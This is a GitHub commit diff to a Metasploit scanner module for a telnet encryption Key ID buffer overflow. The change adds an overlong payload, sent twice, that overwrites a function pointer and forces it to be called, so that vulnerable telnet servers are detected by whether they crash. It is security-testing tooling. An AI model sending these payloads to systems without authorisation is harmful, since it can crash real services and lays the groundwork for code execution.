Skip to content

Commit

Permalink
Handle patched systems accurately (requires actually triggering the bug)
Browse files Browse the repository at this point in the history
  • Loading branch information
HD Moore committed Dec 28, 2011
1 parent f8e3119 commit 617f325
Showing 1 changed file with 31 additions and 7 deletions.
38 changes: 31 additions & 7 deletions modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -64,11 +64,14 @@ def run_host(ip)
break if data.index("\xff\xfa\x26\x02\x01")
end


buff_good = "\xff\xfa\x26" + "\x07" + "\x00" + ("X" * 63) + "\xff\xf0"
buff_long = "\xff\xfa\x26" + "\x07" + "\x00" + ("X" * 64) + "\xff\xf0"
buff_long = "\xff\xfa\x26" + "\x07" + "\x00" + ("X" * 64) + ( "\xcc" * 32) + "\xff\xf0"

begin

#
# Send a long, but within boundary Key ID
#
sock.put(buff_good)
data = sock.get_once(-1, 5) rescue nil
unless data
Expand All @@ -81,18 +84,39 @@ def run_host(ip)
return
end

#
# First round to overwrite the function pointer itself
#
sock.put(buff_long)
data = sock.get_once(-1, 5) rescue nil
data = sock.get_once(-1, 5)
unless data
print_status("#{ip}:#{rport} NOT VULNERABLE: No reply to 64-byte Key ID: #{banner_sanitized}")
print_status("#{ip}:#{rport} NOT VULNERABLE: No reply to first long Key ID: #{banner_sanitized}")
return
end

unless data.index("\xff\xfa\x26\x08\xff\xf0")
print_status("#{ip}:#{rport} UNKNOWN: Invalid reply to Key ID: #{data.unpack("H*")[0]} - #{banner_sanitized}")
print_status("#{ip}:#{rport} UNKNOWN: Invalid reply to first Key ID: #{data.unpack("H*")[0]} - #{banner_sanitized}")
return
end


#
# Second round to force the fucntion to be called
#
sock.put(buff_long)
data = sock.get_once(-1, 5)
unless data
print_status("#{ip}:#{rport} NOT VULNERABLE: No reply to second long Key ID: #{banner_sanitized}")
return
end

unless data.index("\xff\xfa\x26\x08\xff\xf0")
print_status("#{ip}:#{rport} UNKNOWN: Invalid reply to second Key ID: #{data.unpack("H*")[0]} - #{banner_sanitized}")
return
end

print_status("#{ip}:#{rport} NOT VULNERABLE: Service did not disconnect: #{banner_sanitized}")
return

rescue ::EOFError
end

Expand Down

0 comments on commit 617f325

Please sign in to comment.